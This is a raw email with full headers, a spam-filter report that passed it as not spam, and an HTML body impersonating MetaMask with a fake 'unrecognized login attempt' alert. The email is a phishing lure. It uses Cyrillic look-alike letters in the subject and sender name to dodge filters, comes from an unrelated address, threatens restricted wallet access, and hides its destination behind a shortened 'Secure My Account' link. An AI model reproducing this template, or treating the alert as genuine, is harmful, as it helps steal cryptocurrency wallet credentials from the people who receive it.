Return-Path: <postmaster@72e8542c78.nxcli.io>
Delivered-To: info@tictactocsaintcanut.com
Received: from cl-t211-187cl.majeunesse.ca
	by cl-t211-187cl.majeunesse.ca with LMTP
	id J/p7HaCfkWgYcwAAV5eKQw
	(envelope-from <postmaster@72e8542c78.nxcli.io>)
	for <info@tictactocsaintcanut.com>; Tue, 05 Aug 2025 02:07:28 -0400
Return-path: <postmaster@72e8542c78.nxcli.io>
Envelope-to: info@tictactocsaintcanut.com
Delivery-date: Tue, 05 Aug 2025 02:07:28 -0400
Received: from cloudhost-2963186.us-midwest-1.nxcli.net ([209.87.149.96]:48874)
	by cl-t211-187cl.majeunesse.ca with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	(Exim 4.96.2)
	(envelope-from <postmaster@72e8542c78.nxcli.io>)
	id 1ujApc-0007eX-38
	for info@tictactocsaintcanut.com;
	Tue, 05 Aug 2025 02:07:28 -0400
Comment: DomainKeys? See http://domainkeys.sourceforge.net/
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=default; d=72e8542c78.nxcli.io;
  b=J4xuiIPEYuEoQEAOB4Nnotlm8PHNStA7EgKF1h3CJjMalR2QSL3HXxzSAC5zGtai3DBgXqMdtC6AKXMWC4psxaMYSaBgLHFDwm8hdcf6fAvjT9W0R04DYkZPcuuB6yLT+kOq9dN9fGRPMXiltcRdr4RXr7J9zipAzJUmOrHInOxD10Z2OWSw4UprZR+ica04txOCmzeAh7/OOX8UL0BWuMJdup7ppI4S4vnw8jKUE26gNZjjW10+WTTWTxGmkQQT29Sq6ok/B/1PTkIP8vRET8KZHw9zdFUiap9e7Wv3ClQnIyY0NmEK2sWadIbq1bZEAJHBkZzan4zYOewlhOIHhw==;
  h=Received:Date:Message-ID:To:Subject:X-PHP-Originating-Script:From:Reply-To:MIME-Version:Content-Type:X-Mailer:X-Priority:List-Unsubscribe;
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed; d=72e8542c78.nxcli.io; h=
	date:message-id:to:subject:from:reply-to:mime-version
	:content-type:list-unsubscribe; s=default; bh=zAD88eI3AUa+8bD0Mt
	9sB+8YoyXrmLyO1jUW1Y+gYks=; b=F6QGznlJKxbF1rJyudbEpJUvWwtFPtTNAZ
	7mAa6b3lY8RllTyLLiPfvhxuCf9nwc7BvaIhag8RBN/y9rUd4qnOQvQp9Dvr289u
	dWlRFAdkI3703zkjFnFtiTalqTO4GeHGjx8zmW5KiwN/UgY6QNfk3zMFzy5WfXzf
	dodQOqqyf9cCiOHLtxGKIrvL2do7lpl6xXeLqjYYbJwqlMjIae2hYuXG+oDGZjxR
	FfiOZ2wRuoTncFNlpJ502n1S2F4O9vLr2Oi5Z1rsseuOikZLsiarA7a/uqbj4wUC
	Cdx9OFChymoYQdAF9hOhB5cMeIUEfdxohRr52Vgolkc7VqnGKDdA==
Received: (qmail 17062 invoked by uid 10175); 5 Aug 2025 06:06:25 +0000
Date: 5 Aug 2025 06:06:25 +0000
Message-ID: <20250805060625.17050.qmail@cloudhost-2963186.us-midwest-1.nxcli.net>
To: info@tictactocsaintcanut.com
Subject: Sеcurity Аlert — Unrecоgnized Lоgin Attеmpt
X-PHP-Originating-Script: 10175:raw.php
From: "MetаMаsk" <c4l7znpf@han.io>
Reply-To: c4l7znpf@han.io
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
X-Mailer: PHP/8.2.20
X-Priority: 3
List-Unsubscribe: <mailto:unsubscribe@c4l7znpf@han.io>
X-Spam-Status: No, score=1.1
X-Spam-Score: 11
X-Spam-Bar: +
X-Ham-Report: Spam detection software, running on the system "cl-t211-187cl.majeunesse.ca",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Security Alert: Unrecognized Login Attempt We detected a
   login attempt to your MetaMask account from a new device or location. If this
    was not you, your account may be at risk. No, this wasn’t me â [...] 
 Content analysis details:   (1.1 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: nxcli.io]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [209.87.149.96 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                          [209.87.149.96 listed in sa-trusted.bondedsender.org]
  0.1 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
                             mail domains are different
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.7 HTML_IMAGE_ONLY_20     BODY: HTML: images with 1600-2000 bytes of
                             words
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily
                             valid
  0.0 KAM_SHORT              Use of a URL Shortener for very short URL
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
  0.1 DKIM_INVALID           DKIM or DK signature exists, but is not valid
X-Spam-Flag: NO


<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>
<body style="margin:0; padding:0; background:#f9fafb;">
  <center style="font-family:Arial, sans-serif; color:#222; padding:20px;">

    <!-- Logo (hosted on a trusted CDN) -->
    <img
      src="https://raw.githubusercontent.com/MetaMask/brand-resources/master/SVG/metamask-fox.svg"
      alt="MetaMask Logo"
      width="48"
      style="display:block; margin:0 auto 16px; border:none; outline:none;"
    />

    <!-- Headline -->
    <strong style="font-size:18px; color:#f6851b; display:block; margin-bottom:12px;">
      Security Alert: Unrecognized Login Attempt
    </strong>

    <!-- Body copy -->
    <span style="font-size:14px; line-height:1.4; display:block; margin-bottom:16px;">
      We detected a login attempt to your MetaMask account from a new device or location.<br/>
      If this was <strong>not you</strong>, your account may be at risk.
    </span>

    <!-- Call-to-action link as visible text -->
    <a
      href="https://t.co/zFFiS20j9y?id=1271746823309569725-2817"
      style="
        display:inline-block;
        font-size:14px;
        font-weight:bold;
        color:#ffffff;
        background-color:#f6851b;
        text-decoration:none;
        padding:10px 20px;
        border-radius:4px;
      "
    >
      No, this wasn’t me – Secure My Account
    </a>

    <!-- Footer copy -->
    <span style="font-size:12px; color:#666666; display:block; margin:16px 0 0;">
      Your wallet access may be restricted until you verify this activity.<br/>
      If you did not request this, please ignore this message.
    </span>

    <span style="font-size:12px; color:#aaaaaa; display:block; margin-top:8px;">
      — MetaMask Security Team
    </span>

  </center>
</body>
</html>

